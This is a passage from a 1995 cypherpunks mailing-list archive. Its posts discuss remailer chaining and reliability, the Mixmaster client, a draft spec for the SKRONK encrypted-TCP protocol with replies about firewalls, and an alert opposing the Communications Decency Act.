Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi
                       ** PGP encrypted email preferred! **

Cop: "How many beers have you had tonight, bro?"
Suspect: "Seventy."  -- from the TV show "Cops"



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcottrell@popmail.ucsd.edu (Lance Cottrell)
Date: Sun, 5 Feb 95 00:22:00 PST
To: cypherpunks@toad.com
Subject: Re:  Why encrypt intra-remailernet.
Message-ID: <ab5a3af601021004300d@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


>  If the remailer issued it's own non-blinded stamps, the remailer
>would have to keep a list of canceled stamps.  (For as long as that
>series of stamps remains valid.)  If the remailer used Chaumiam e-cash
>no logs would need to be kept at all.

I was not under the impression that Chaum e-cash was free from the need to
keep a list of spent cash. Do you meant that it would be the bank, not the
remailer, that would keep the database?
>
>> Another aspect worth mentioning is that message splitting can make
>> the kinds of statistical correlations that Wei Dai was looking at
>> more of a danger.  [...]  Ideally you'd want to dribble them out at
>> some standard rate, a rate at which you always send a message
>> whether you have something to send or not.  But this may introduce
>> unacceptable latency.
>
>  If everybody ran a second level remailer, and if they always
>forwarded something (of very nearly the same size) when they recieved
>an encrypted message, then without compromising the users machine it
>would be imposible to say when a message was delivered.  Some of the
>messages forwarded would need to be junk.  Is there a polite way to
>send mail to a remailer, and ask it to junk the mail?  Some of the
>messages forwarded would have to be 'part n of m' messages.
>
>  Noyb

Messages are not identifiable as "part n of m" except at the last hop. If
you are a remailer, then they are only visible as such to you. In transit
they appear as any other message. Yes, there is a polite way to send to a
remailer's bit bucket with some remailers. Ghio remailers will trash any
message sent which requests remailing to "null". Remailer@nately is a Ghio
remailer. I can't remember if I implemented that in Mixmaster. If not, I
will.

--------------------------------------------------
Lance Cottrell  who does not speak for CASS/UCSD
loki@nately.ucsd.edu
PGP 2.6 key available by finger or server. Encrypted mail welcome.
Home page http://nately.ucsd.edu/~loki/
Check out my essay on the next generation remailer Mixmaster on the WWW page.
For anon remailer info, mail remailer@nately.ucsd.edu Subject: remailer-help

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: david.lloyd-jones@canrem.com (David Lloyd-Jones)
Date: Sat, 4 Feb 95 23:00:50 PST
To: cypherpunks@toad.com
Subject: Vinge on PKE ?
In-Reply-To: <m0ravI7-0013GtC@garnet.msen.com>
Message-ID: <60.19880.6525.0C1CDEB4@canrem.com>
MIME-Version: 1.0
Content-Type: text/plain


LP+Apologies if I repeat a question which has already been answered.
  +My only gateway onto the Net is very expensive, and I miss many
  +important postings.  Some time ago it was asked why Vernor Vinge
  +made passing reference to humans' naivete in trusting public key
  +encryption, and some posters were seeking to contact professor
  +Vinge for clarification.  Has any further explanation been 
  +discovered for his distrust of PKE?

I once had a girlfriend who factored five digit numbers just by 
looking at them.  "29367?  No, that's not prime.  It's 117 times 
251..."  Good ol' Elizabeth.  That's what you get for an "IQ" of 
around 175.  Surely there might be higher "IQ's" someplace else in 
Universe?
 
Albert Szent-Georgi once told me his thought that an IQ difference of 
thirty points meant that one person solves by inspetion problems which 
no amount of explanation can make clear to the other.  He added that 
in a normal day we run into people spanning three such gulfs.
 
If an IQ of 100 routinely factors two digit decimal numbers, and you 
get another digit for every twenty or thirty points, then you're 
looking for beings with IQ's in the 1,000 range to factor 100 digits 
binary...
 
                       Cheers,
 
                               -dlj.

david.lloyd-jones@canrem.com

 * 1st 1.11 #3818 * "640k should be enough for anybody" - Bill Gates, 1981.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcottrell@popmail.ucsd.edu (Lance Cottrell)
Date: Sun, 5 Feb 95 00:53:11 PST
To: cypherpunks@toad.com
Subject: Mixmaster client release
Message-ID: <ab5a41f403021004d49b@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I have put a SPARC executable for the Mixmaster client on my home page. It
is easy to install, just run one script. Please send me any comments.
-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBLzSSA1Vkk3dax7hlAQGhyAP8DkA2AetIpCHfFhnUDP8qiKdPJ3ish36V
ZFA/W3Gx+6Glzj+5ri7fnug6N3ENyLJ3eoUfWVWjJ6uK5yMczMQB6wX4m3Afhrwz
xUw9WCKwbP0cktnLnMvbufDxyLTsGxA6yvWaRdCRVcqP4eyAVN4SiHCftE8EbI6Y
Pg+3SYtjDf4=
=5lAa
-----END PGP SIGNATURE-----

--------------------------------------------------
Lance Cottrell  who does not speak for CASS/UCSD
loki@nately.ucsd.edu
PGP 2.6 key available by finger or server. Encrypted mail welcome.
Home page http://nately.ucsd.edu/~loki/
Check out my essay on the next generation remailer Mixmaster on the WWW page.
For anon remailer info, mail remailer@nately.ucsd.edu Subject: remailer-help

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: strick at The Yak <strick@yak.net>
Date: Sun, 5 Feb 95 02:03:31 PST
To: cypherpunks@toad.com
Subject: The SKRONK protocols (version 0.6)
Message-ID: <199502051002.CAA01090@nando.yak.net>
MIME-Version: 1.0
Content-Type: text/plain


========================================================================
The SKRONK protocols                                         version 0.6
========================================================================
                                                        Henry Strickland 
                                                        <strick@yak.net>
                                                        Sun Feb  5  1995


                          This is a working document, subject to change. 
                                                   Please comment on it!


Skronk is a user-level C library that re-implements the usual "posix
i/o" (unix man 2) functions and "berkeley socket" functions with a set
of functions that can use enhanced or alternate ("skronked") protocols
for TCP connections.  (Typical enhancements could be authentication
and/or encryption of the connection.)  A simple negotiation protocol
allows the clients and servers to agree on what enhancements are
desired or required.

Skronk is designed so that your common unix network clients and servers
(telnet, sendmail, ftp, nntp, X11, etc.) can be merely relinked with the
skronk library (libskronk.a) without changing the source code for the
programs.

As a matter of configuration and policy, skronked clients and servers
may choose either to interoperate with normal (non-skronked) client and
servers or to forbid normal connections.  In order to not interfere
with non-skronked programs, skronked connections take place an
alternate TCP server port numbers.

/* "Skronk" is a musical term, for a new-york-ish free-jazz 
 *   massively saxaphonish kind of music, e.g. John Zorn  
 */


---- THE UDP PROTOCOL BEGINS HERE ----

THE SKRONK MAP DAEMON

A skronk map daemon is a UDP service that tells what skronked services are
available from a site, and what alternate TCP server port numbers they
use.

The skronk map daemon receives "skronk map request" packets and returns
"skronk map reply" packets that list pairs of port numbers, mapping
normal server port numbers to corresponding skronked port numbers.  The
skronk map reply packet is sent to the same IP address and host port
that the request was received from.

If there is no map reply in a certain time, after a couple of 
map request resends, the skronk map client should assume that 
skronked services are not currently available on that host.

SKRONK MAP REQUEST PACKET

See "struct skronk_map_request" below.  The comment will say
something like "finger skronk@yak.net for info", to explain what
is going on to network administrators who see these packets for
the first time probing their hosts.

SKRONK MAP REPLY PACKET

See "struct skronk_map_reply" below.  The "serial" field should
match the serial field of the map request packet.  Replies be cached,
using the "ttl" time-to-live field for a timeout.

If the request packet cannot be replied to (perhaps because the action
was not understood, or the version was wrong), a reply with action
SKRONK_MAP_NACK should be returned.  If the magic field of the request
is wrong, do not reply.  (The magic number should be changed if the
first five fields are changed; otherwise, version and opcode may be
changed to implement new protocols.)

Skronk map clients should also recognize as a reply the 
relevant ICMP packets indicating that there is no skronk map daemon.

Version numbers 128 through 255 will not be assigned and are
available for experimentation.  Action codes 128 through 255 will
not be assigned and are available for experimentation.

Initial prototypes use UDP port 333 for the skronk map service,
until a number is officially allocated.

--------------------------------

        /* unsigned long = 4 octets, "network" order */
        /* unsigned short = 2 octets, "network" order */
        /* char = 1 octet, ASCII encoding, NUL terminated */

        struct skronk_map_request {
                unsigned long   magic;          /* SKRONK_MAGIC */
                unsigned long   serial;
                unsigned short  version;        /* SKRONK_VERSION */
                unsigned short  action;         /* SKRONK_MAP_REQUEST */
                unsigned long   reserved;       /* (corresponds to ttl) */
                char            comment[1];  /* variable length, NTBS */
                /* after NUL, remained of packet ignored */
        };

        #define SKRONK_MAGIC    0x1F1206FB  /* tail(md5("SKRONK_MAGIC\n")) */
        #define SKRONK_VERSION  0x0101		/* major 1 minor 1 */

	#define SKRONK_MAP_REQUEST      63      /* '?' */
	#define SKRONK_MAP_RESPONSE     46      /* '.' */
	#define SKRONK_MAP_NACK         33      /* '!' */

        #define SKRONK_DEFAULT_TTL      3600    /* one hour */

        #define SKRONK_NUM_TRIES        3       /* try three packets */
        #define SKRONK_WAIT_TIME        3       /* wait three seconds */

        struct skronk_map_reply {
                unsigned long   magic;          /* SKRONK_MAGIC */
                unsigned long   serial;         /* matches map request serial */
                unsigned short  version;        /* SKRONK_VERSION */
                unsigned short  action;         /* SKRONK_MAP_REPLY or _NACK */
                unsigned long   ttl;            /* cache time to live, in seconds */
                unsigned short  map[1];         /* variable length, 0 terminate */
                /* after 0, remainder of packet ignored */
        };

--------------------------------


EXAMPLE SKRONK MAP REQUEST AND REPLY

Map Request Packet:

   ip header:
        UDP             protocol
        128.32.43.52    source_ip_address
        199.170.88.5    destination_ip_address
   udp header:
        1066            source_port
        skronk          destination_port (number not assigned yet)
   body:
        0x1F1206FB      skronk_magic
        2001            skronk_serial
        1               version
        '?'             action (SKRONK_MAP_REQUEST)
        "finger         comment (for paranoid net admins)
         skronk@yak.net
         for info"

Map Request Reply:

   ip header:
        UDP             protocol
        199.170.88.5    source_ip_address
        128.32.43.52    destination_ip_address
   udp header:
        skronk          source_port (number not assigned yet)
        1066            destination_port
   body:
        0x1F1206FB      skronk_magic
        2001            skronk_serial (copied from request)
        1               version
        '.'             action (SKRONK_MAP_REPLY)
        3600            ttl (one hour)
   map list:
        23, 423,        /* skronked TELNET on port 423 */
        25, 425,        /* skronked SMTP on port 425 */
        70, 470,        /* skronked GOPHER on port 470 */
        80, 480,        /* skronked HTTP on port 480 */
        514, 914,       /* skronked shell on port 914 */
        750, 350,       /* skronked shell on port 350 */
        6000, 6400,     /* skronked X11 on port 6400 */
        0               /* zero marks end of list */
                        /* ... assume other services 
                                cannot be skronked */

/* 
 * Notice the skronked ports on this host (199.170.88.5)
 * have been allocated by the system administrator
 * using a simple (but arbitrary) rule: 
 *
 *     add 400 to the normal number, unless this has
 *     problems (like it would bring a less-than-1024
 *     port number to be greater-than-1024), in which
 *     case subtract 400.
 *
 * I propose this rule as a default, since it does not seem
 * to collide with common port numbers, but because we 
 * have and always use the skronk map daemon, each site
 * could pick different numbers.
 */


---- THE UDP PROTOCOL ENDS HERE ----


SKRONK PER-CONNECTION NEGOTIATION

/* 
 * The current skronk prototype temporarily works on 
 * a simpler negotiation scheme, but below is the
 * intended scheme.
 */

/*
 * Good questions:  
 * 1.  Would telnet-style negotiations be better?
 *
 *      I conclude not:
 *      -- this offers options to be combined at once
 *      -- this does fewer passes from server to client
 *      -- this uses ASCII names rather than numbers
 *              for options, which allows liberal 
 *              experimentation with "x-" names.
 *
 * 2. Do we need some escape-character & character-stuffing 
 *    to re-open negotiations?
 *
 *      Maybe... but flow of control probably never returns 
 *      to the skronk layers with any such requests, so let's
 *      let some escape-octet (with escape-octet-stuffing) 
 *      option for return-to-negotiation be a negotiated
 *      option that can be added later.
 */

The skronk library does a negotiation at the beginning of each TCP
connection, after "connect()" and "accept()" rendezvous, before
returning flow of control to the application.  This negotiation is
transparent to the application, but may be configured with skronk
configuration files or environment variables.

These negotiations should not be confused with other negotiations
specific to the program, such as TELNET negotiations, which would occur
later, once control is returned to the application.


/*
 *  I should first define 'negotiation line', 'acceptance line', 
 *    and 'disconnect' to describe the following...
 */


When the connection is made, the server writes a line of 10 to 999
octets, composed of ASCII characters, terminating with CRLF, to the
client.  This line must begin with the eight characters

        'S'  'K'  'R'  SPACE  h  t  o  SPACE

where h, t, and o are three decimal digits '0'-'9' (hundreds, tens, and
ones places), with leading a zero in the hundreds place if required,
specifying the length of this line, counting the CRLF at the end.  Thus
the minimum length of the line is 10.  The reason for putting the
length of the line in the front is so that the client can first read 8
characters, and then read the rest of the line, but not try to read any
characters beyond that size.

After the "SKR hto " follow zero or more words of the regexp form

        [A-Za-z0-9+][A-Za-z0-9/.+-]*

separated by one or more SPACE characters.  Case matters.  These words
specify protocols, and should registered with strick@yak.net, or begin
with "x-" for experimental protocols.

By sending this line, the server volunteers to server this protocol
skronked with any of the listed protocols.  The server should list the
protocols in order of preference, its favored protocols first.

The client reads this line, chooses one (or more) protocols, and
responds with a similar line, listing only the protocol(s) that it
chooses to use, in a specific "stacking" order, from the first protocol
applied to the last.  For instance, if it chooses "gzip" compression
followed by "des" encryption, it should list them in the order "gzip
des".  Some protocols choices may not be compatible, and some protocol
choices may not have stacking order; this will have to be described
when the protocols are defined.

If the client does not like any of the choices offered, it may hang up
the connection, instead of replying with a line.

If the server accepts the protocol the client chose, it responds with 8
characters

        'S'  'K'  'R'  SPACE  'O'  'K'  CR  LF

If not, it may either disconnect the connection, or it may send another
initial negotiation line, which should be different from the initial
line offered (probably with fewer options for the client to choose).


If the negotiation is accepted, what happens next depends on the
accepted protocols, and on the actions of the rest of the program.
Typically a selected protocol may have to do some more negotiation or
trading of data before control is returned to the application.  And
later reads and writes from the application to the skronked socket may
be intercepted and frobbed.


PRIMORDIAL PROTOCOLS

For stream encryption:

	/* needs work */

	A simple initial protocol named "dh/idea.1".

	Use Diffee-Hellman key exchange from RSAREF 2.0.
	Let the server declare the R_DH_PARAMS, and the size of things.
	Use IDEA encryption in CFB mode from PGP 2.6.
	No authentication -- susceptible to man-in-the-middle 
	attacks at connection time.


For authentication:

	/* needs lots of work */

	A simple initial protocol named "auth-pgp.1"

	Use PGP public keys and certificates to create
	a web of trust and thereby authenticate hosts.

	Can be combined with "dh/idea.1" or used separately. 

	(This probably requires having secret key pass phrases
	on multiuser machines, so it's one small step forward.)



--------------------------------

END $Header: /x/nepal/x/yak/strick/work/skronk-write/RCS/skronk.proto,v 1.3 95/02/05 01:18:49 strick Exp Locker: strick $




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@aeinet.com>
Date: Sun, 5 Feb 95 08:50:30 PST
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Here we go again...
Message-ID: <Chameleon.4.01.950205084831.jcorgan@comet.aeinet.com>
MIME-Version: 1.0
Content-Type: text/plain



+---------------------------------------------------------+
 ##### #     #     #          #     #     ##### ####  #####
 #     ##   ##    # #        # #    #     #     #   #   #
 ###   # # # #   #   #      #   #   #     ###   ####    #
 #     #  #  #  #######    #######  #     #     #  #    #
 ##### #     # #       #  #       # ##### ##### #   #   #
+---------------------------------------------------------+
                       -> EMA ALERT <-
            News For and About the Members of the
               ELECTRONIC MESSAGING ASSOCIATION
============================================================
                February 3, 1995 -- Number 18
<---------------------------------------------------------->
                  ***** SPECIAL ALERT *****
 - Congress to consider making all system operators liable
   for messaging content.  Bill would force employers to
   monitor message content.              ACTION NEEDED NOW!
<---------------------------------------------------------->

UNREASONABLE NETWORK POLICING PROPOSED
   Yesterday, Senator Jim Exon (D-NE) introduced S.314, the
Communications Decency Act of 1995, in the United States
Senate.  In an effort to stamp out digital pornography, it
makes all telecommunications providers doing business in the
United States (from the telephone companies all the way down
to offices that use LANs) liable for the content of anything
sent over their networks.  To avoid the possibility of tens
of thousands of dollars in fines and up to two years in
jail, business owners would be forced to police their
networks and monitor in advance all messages sent over them.

WITHOUT ACTION - COULD BE LAW IN MONTHS
   This bill is substantially the same as the one he put
forward last year.  He will offer it as an amendment to the
pending telecommunications deregulation legislation in the
U.S. Senate, which is expected to be enacted by July.  Last
year, his amendment was adopted even though many thought it
hastily drafted and poorly thought out.  Fortunately, the
telecommunications deregulation legislation died.  This
year, a more conservative U.S. Congress may be even more
reluctant to challenge a "morality" amendment; and its
legislative vehicle, the telecommunications deregulation
legislation, stands a much better chance of passage this
year.

ACTION NEEDED NOW
   Action by the business community is needed now.  Please
notify your corporate government affairs office and/or your
legal counsel.  This measure could be adopted as an
amendment to the telecommunications bill IN A MATTER OF
WEEKS (or potentially added to any legislation pending on
the U.S. Senate floor), if business does not mobilize
against it.  S.314 will not stop digital pornography, but it
could devastate the messaging business.  If you are
interested in further information or are able to participate
in lobbying efforts over the next few weeks, contact Sarah
Reardon at EMA (see below).

------------------------------------------------------------
EMA ALERT is published and copyrighted (1995) by the
Electronic Messaging Association.  Permission to reproduce
and/or redistribute with attribution is hereby given to all
EMA members.  For more information about anything in EMA
ALERT, contact EMA via e-mail - use either X.400 (S=info;
O=ema; A=mci; C=us) or Internet (info@ema.org) address,
facsimile (1-703-524-5558), or telephone (1-703-524-5550).
Any EMA staff member can be addressed directly via e-mail by
using, for X.400, G=<firstname>; S=<lastname>; O=ema; A=mci;
C=us, and, for Internet, <firstinitial><lastname>@ema.org.
EMA's postal address is 1655 N. Fort Myer Dr. #850,
Arlington, VA 22209 USA.


==
Johnathan Corgan       "Violence is the last refuge of the incompetent."
jcorgan@aeinet.com                    -Isaac Asimov






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Syed Yusuf <yusuf921@uidaho.edu>
Date: Sun, 5 Feb 95 09:55:12 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: No Subject
Message-ID: <Pine.HPP.3.91.950205095632.27089A-100000@goshawk.csrv.uidaho.edu>
MIME-Version: 1.0
Content-Type: text/plain



Does anyone have a an list of a current remailers?


/sy/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 5 Feb 95 07:05:34 PST
To: cypherpunks@toad.com
Subject: NYT on Tera and UUNet
Message-ID: <199502051504.KAA09875@pipe3.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


John Markoff writes today on Tera Computer's supercomputer 
prayers.


For email copy (13k) send blank message to <jya@pipeline.com> 
with subject:  TER_nup


And, Laurie Flynn writes on UUNet's tender tap by Microsoft.


For copy (13k), same, with subject:  UUN_zzz




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@tower.techwood.org (Anonymous)
Date: Sun, 5 Feb 95 10:02:38 PST
To: cypherpunks@toad.com
Subject: BROKEN REMAILERS
Message-ID: <199502051758.MAA02142@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I have tested remailers and their PGP keys over some time now and this is
what I have found:	

MIXMASTER is a great, fast and reliable remailer but you can't PGP with it.

REMAILER@NATELY.UCSD.EDU is just as fast and reliable (same guy) and you 
can use PGP, but a few weeks ago it started acting really funny: It will
forward any ATTACHED files, but it will only read the first commandline
of a PGP block that has been pgp'ed with Nately's public key.  In other
words, if you wrap layers of chained remailers inside each other, you 
will now have to have NATELY as the *last* link in your chain as it will
otherwise discard the rest of the block. Alternatively you can have the
chain as a series of attached files.

USURA is really quick too and has lately been reliable. But it has always
suffered from the same problem as Nately, namely that it will truncate all
of the remaining lines in a PGP message encrypted with its own public key,
this making it impossible to chain effectively.  It will read the first 
command only.  It DOES forward all attached files, however (by which I 
mean text that have been tagged on OUTSIDE of the pgp block encrypted
to Usura).

EXTROPIA and VOX suffer from the exact *opposite* problem.  They forward
the entire inner remains of a pgp block untouched after having only read
the first commands to them.  But they both ignore and discard all text
outside that first initial pgp block encrypted with their public keys.
This means that you cannot send a message with multiple pgp's through
either of them: because any attached parts get thrown away.  
As a practical application, it means that you can't use either of these
two as part of your nym@alpha.c2.org setup, sadly...
BTW, with VOX you will have to add the ::Encrypted: PGP bit whereas you
don't have to do that with Extropia (or with alias@alpha.c2.org for that
matter).

REBMA is ideal in that it does not touch your message: You can use *both*
attached files and "wheels within wheels" where you have layers of pgp'ed
remailer instructions hidden inside one another. The main problem with 
REBMA is that she has been down a bit lately and even when she is not down,
you have to wait ages: 1 or 2 days, sometimes even more.

The best remailer, IMO, is HAL@ALUMNI.CALTECH.EDU which operates in tandem 
with HFINNEY@SHELL.PORTAL.COM: Both are fast and very reliable.  Moreover,
neither will throw away attached messages (like Vox and Extropia do) nor
throw away the other loops of an inner-encrypted pgp reply block (like
Usura and now, lately, unfortunately, also Nately do). Very versatile!

I used to like JPUNIX too.  Now it seems HOMER@RAHUL.NET is a winner,
I don't know if he will stay reliable, but he sure is fast.  In terms
of PGP, he is just as good as HAL/HFINNEY.  Likewise, TOWER: Both work!

The DESERT remailer is sometimes fast, sometimes slow. I have a feel it waits
until it can send out stuff in batches. So sometimes you have to wait a day
or so.  It works with Anon-To: last I checked, if I recall correctly.

That's the extent of my playing around. I would appreciate corrections
and help, especially information with some of the remailers I have not 
mentioned here.  I have not played with Q or with FLAME, for instance. 

||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

.Signature field left blank
(or it wouldn't be anonymous, would it?)

||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLzUR0CoZzwIn1bdtAQGoHQF/ep/uxpNHaCX4JUoETqULLax8Q0vu6VrY
Jh1P/ey2QrWi1TKWky3/SJ967S+xoqg0
=gEZ3
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Sun, 5 Feb 95 13:00:32 PST
To: cypherpunks@toad.com
Subject: Zimmermann charges dropped?
Message-ID: <199502052059.MAA08492@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Apologies if this has been discussed and I somehow missed it. I just
got back from Monte Carlo last night and have briefly scanned the 500+
accumulated messages, not seeing this item mentioned.

Drew Taubman (sp?), the new Executive Director of the EFF, told me
that in recent days the grand jury meeting in the PRZ case did in fact
decide to go forward with the indictment.

However, says Drew, the judge in the case dismissed the charges after
looking at them, apparently in about an hour or so. He cited the
absence of relevant law in the case (as I understand it, the argument
being that there is no law against what PRZ did, i.e., "make code
available" in such a way that _others_ might then access it and
perhaps then illegally export it (assuming such export might be later
proved to be illegal).

Drew went on to tell me that the judge said there would need to be a
relevant law on this, and that Senator Leahy and his staff (recall
their involvement in the Digital Telephony Bill) are already at work
drafting such legislation.

I haven't seen mention of this, so I thought I'd mention it here. I
could of course try to get confirmation first from Phil, but he is
notoriously hard to reach in e-mail, ironically, and this seems
sufficiently important to mention to the list.

And if you can't trust the EFF, who _can_ you trust? (Don't answer
that.)

--Tim May

-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nobody@eniac.ac.siue.edu (Anonymous)
Date: Sun, 5 Feb 95 10:03:55 PST
To: cypherpunks@toad.com
Subject: BROKEN REMAILERS
Message-ID: <199502051800.NAA02153@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Here's a bug report on some remailers that won't work in a nested chain
when it is encrypted.
First, a look at how a chain is supposed to work.  Three good ones, chained
like:
1) Tower->Alumni->Homer. OK
2) Homer->Tower->Alumni. OK
3) Homer->Alumni->Tower. OK

This was in a test of the new Tower remailer. In other words, 
it doesn't matter if Tower is at the beginning, middle or end of a chain.
The message will reach its intended destination. (In fact, quite fast).

But some other remailers fuck up when they become part of a nested, encrypted
chain.  One of those? The Syrinx remailer.  Here are the test results:
1) Syrinx->alumni->Homer. NO
2) Homer->syrinx->alumni. NO
3) Homer->alumni->syrinx. OK

The third one came back to be in under an hour. No reply from number 1 and 2.
I don't know why it doesn't work but it doesn't! Maybe one explanation is
that as Syrinx gets a messages it sees the :: Encrypted: PGP and then
decodes it using its key (as it should), but then in the decrypted message
it sees another :: Encrypted: PGP and attempts to decode it again using its
key (again), fails (of course) and aborts. This to me is the only explanation
as to this strange behaviour. It is a serious problem and I do think that
it should be brought to the attention of everybody. Now I haven't tested
all of the remailers so I don't really know which one also will fail the
test. In that test I choose Homer and Alumni because I know that these 2
are reliable and don't care in what order they are in a chain, I also always
send the same test message it reads:

This is a test
line1
line2
line3
line4
Sent <TIME and DATE>
to #1->#2->#3

So its easy to do. And when I get a reply I know which one (1, 2 or 3)
worked, since the path is in the message. Now I know that syrinx doesn't
work. So I add it to my list of those remailers that failed the test.

Also on this list are:
* Nately
and 
* Usura
as they both share the same properties as Syrinx: The chained message gets
home ONLY is Syrinx / Usura / Nately is the _last_ link of the chain.
(Nately *used* to be as good as Homer, Tower, Hal and Portal, but not
anymore. Around Christmas, it changed its performance. Maybe the operator
tinkered - don't what what he did, but he made it worse.)

Two other remailers failing our tests, but for other reasons, are:
* Extropia
and 
* Vox.
Neither forwards attached files. In other words, anything outside of the 
original encrypted block gets sent on.  This makes both of them useless
for reply blocks, for instance.


- --
anon
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLzUSGCoZzwIn1bdtAQH3IgF9FIUMOTd6rsihkaXUCKn4w14qTtOEfjcD
sXFPB/62K6NQZCuHTUPBDa30jh2c8sJY
=6tBU
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Sun, 5 Feb 95 11:02:38 PST
To: strick@yak.net (strick at The Yak)
Subject: Re: The SKRONK protocols (version 0.6)
In-Reply-To: <199502051002.CAA01090@nando.yak.net>
Message-ID: <m0rb7Za-0009tFC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


...
> /* "Skronk" is a musical term, for a new-york-ish free-jazz 
>  *   massively saxaphonish kind of music, e.g. John Zorn  
>  */
> 
> 
> ---- THE UDP PROTOCOL BEGINS HERE ----
> 
> THE SKRONK MAP DAEMON
> 
> A skronk map daemon is a UDP service that tells what skronked services are
> available from a site, and what alternate TCP server port numbers they
> use.

UDP won't get through most firewalls.

Build in support for non-transparent firewalls (ie: telnet gatekeeper,
c sys port).

Handle getting access to skronked protocols by using the standard telnet
port and logging in as 'skronk' to get access to a service multiplexer.

Just some suggestions to deal with realities of availability.

...

sdw
-- 
Stephen D. Williams    25Feb1965 VW,OH      sdw@lig.net http://www.lig.net/sdw
Senior Consultant    513-865-9599 FAX/LIG   513.496.5223 OH Page BA Aug94-Feb95
OO R&D AI:NN/ES crypto     By Buggy: 2464 Rosina Dr., Miamisburg, OH 45342-6430
Firewall/WWW srvrs ICBM/GPS: 39 38 34N 84 17 12W home, 37 58 41N 122 01 48W wrk
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.28Jan95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Sun, 5 Feb 95 12:25:05 PST
To: sdw@lig.net (Stephen D. Williams)
Subject: Re: The SKRONK protocols (version 0.6)
In-Reply-To: <m0rb7Za-0009tFC@sdwsys>
Message-ID: <199502052024.PAA21302@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


Stephen D Williams wrote:

| > THE SKRONK MAP DAEMON
| > 
| > A skronk map daemon is a UDP service that tells what skronked services are
| > available from a site, and what alternate TCP server port numbers they
| > use.
| 
| UDP won't get through most firewalls.
| 
| Build in support for non-transparent firewalls (ie: telnet gatekeeper,
| c sys port).
| 
| Handle getting access to skronked protocols by using the standard telnet
| port and logging in as 'skronk' to get access to a service multiplexer.
| 
| Just some suggestions to deal with realities of availability.

	I was going to say some similar things about firewalls, but
then decided that Strick is doing the right thing.  If the firewall
wants to offer skronk'd services, it can respond to the UDP packet,
and offer up services, presumably through relays.

	The relay/proxy programs for these protocols already exist.
So you can reuse them to carry encrypted traffic through your
firewall.  Why build a new set of proxies that have to be checked for
correctness?

	Of course, letting encrypted traffic through your firewall
will upset those people who thought they can virus/porn scan at the
firewall.  Such scanners are almost always broken anyway.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
						       -Hume



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Sun, 5 Feb 95 12:33:21 PST
To: adam@bwh.harvard.edu (Adam Shostack)
Subject: Re: The SKRONK protocols (version 0.6)
In-Reply-To: <199502052024.PAA21302@bwh.harvard.edu>
Message-ID: <m0rb8zF-0009tFC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Stephen D Williams wrote:
> 
> | > THE SKRONK MAP DAEMON
...
> 	I was going to say some similar things about firewalls, but
> then decided that Strick is doing the right thing.  If the firewall
> wants to offer skronk'd services, it can respond to the UDP packet,
> and offer up services, presumably through relays.
> 
> 	The relay/proxy programs for these protocols already exist.
> So you can reuse them to carry encrypted traffic through your
> firewall.  Why build a new set of proxies that have to be checked for
> correctness?

I wasn't talking about replacing the proxy's, but 'playing' them instead
of assuming you could connect directly between the skronked program and
it's server.

In otherwords: Since it looks like we're stuck with visible proxy
firewalls for the forseeable future, we need to start codifying
proxy-relay semantics into new protocol preambles.  This gets us back
to more or less transparent network services.  This is especially true
